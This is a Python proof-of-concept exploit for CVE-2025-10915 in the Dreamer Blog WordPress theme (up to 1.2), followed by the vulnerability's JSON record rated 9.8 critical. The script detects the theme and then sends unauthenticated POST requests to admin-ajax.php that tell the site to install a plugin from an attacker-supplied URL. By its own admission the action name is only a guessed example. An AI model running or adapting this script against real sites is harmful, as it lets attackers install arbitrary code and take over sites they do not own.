CVE-2025-10915

# CVE-2025-10915 PoC - Dreamer Blog Theme Arbitrary Plugin Installation # Target: WordPress sites using Dreamer Blog theme <= 1.2 # Note: This is for educational and security research purposes only import requests import argparse def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-10915""" # Check for Dreamer Blog theme presence themes_url = f"{target_url}/wp-content/themes/dreamer-blog/" try: response = requests.get(themes_url, timeout=10) if response.status_code == 200: print(f"[+] Dreamer Blog theme detected at {target_url}") return True except requests.RequestException as e: print(f"[-] Error checking target: {e}") return False def exploit_arbitrary_install(target_url, plugin_url): """ Exploit arbitrary plugin installation via missing capability check The vulnerable endpoint lacks proper authorization validation """ # Common vulnerable AJAX endpoints in Dreamer Blog theme vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-admin/admin.php" ] # Payload to install arbitrary plugin # Note: Requires identifying the exact vulnerable function exploit_data = { 'action': 'dreamer_blog_install_plugin', # Example action name 'plugin_url': plugin_url, # Attacker-controlled plugin URL 'nonce': '' # Missing nonce validation is part of the issue } print(f"[*] Attempting to install plugin from: {plugin_url}") for endpoint in vulnerable_endpoints: try: response = requests.post(endpoint, data=exploit_data, timeout=30) if response.status_code == 200: print(f"[+] Request sent to {endpoint}") print(f"[*] Response: {response.text[:500]}") except requests.RequestException as e: print(f"[-] Request failed: {e}") def main(): parser = argparse.ArgumentParser(description='CVE-2025-10915 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-p', '--plugin', required=True, help='Plugin URL to install') args = parser.parse_args() print("="*60) print("CVE-2025-10915 - Dreamer Blog Theme Arbitrary Installation") print("="*60) if check_vulnerability(args.url): exploit_arbitrary_install(args.url, args.plugin) else: print("[-] Target does not appear to be vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-10915", "sourceIdentifier": "[email protected]", "published": "2026-01-13T06:15:49.147", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Dreamer Blog WordPress theme through 1.2 is vulnerable to arbitrary installations due to a missing capability check."}, {"lang": "es", "value": "El tema de WordPress Dreamer Blog hasta la 1.2 es vulnerable a instalaciones arbitrarias debido a una verificación de capacidad faltante."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "references": [{"url": "https://wpscan.com/vulnerability/dab3a804-9027-4b4a-b61c-61b562045bc4/", "source": "[email protected]"}]}}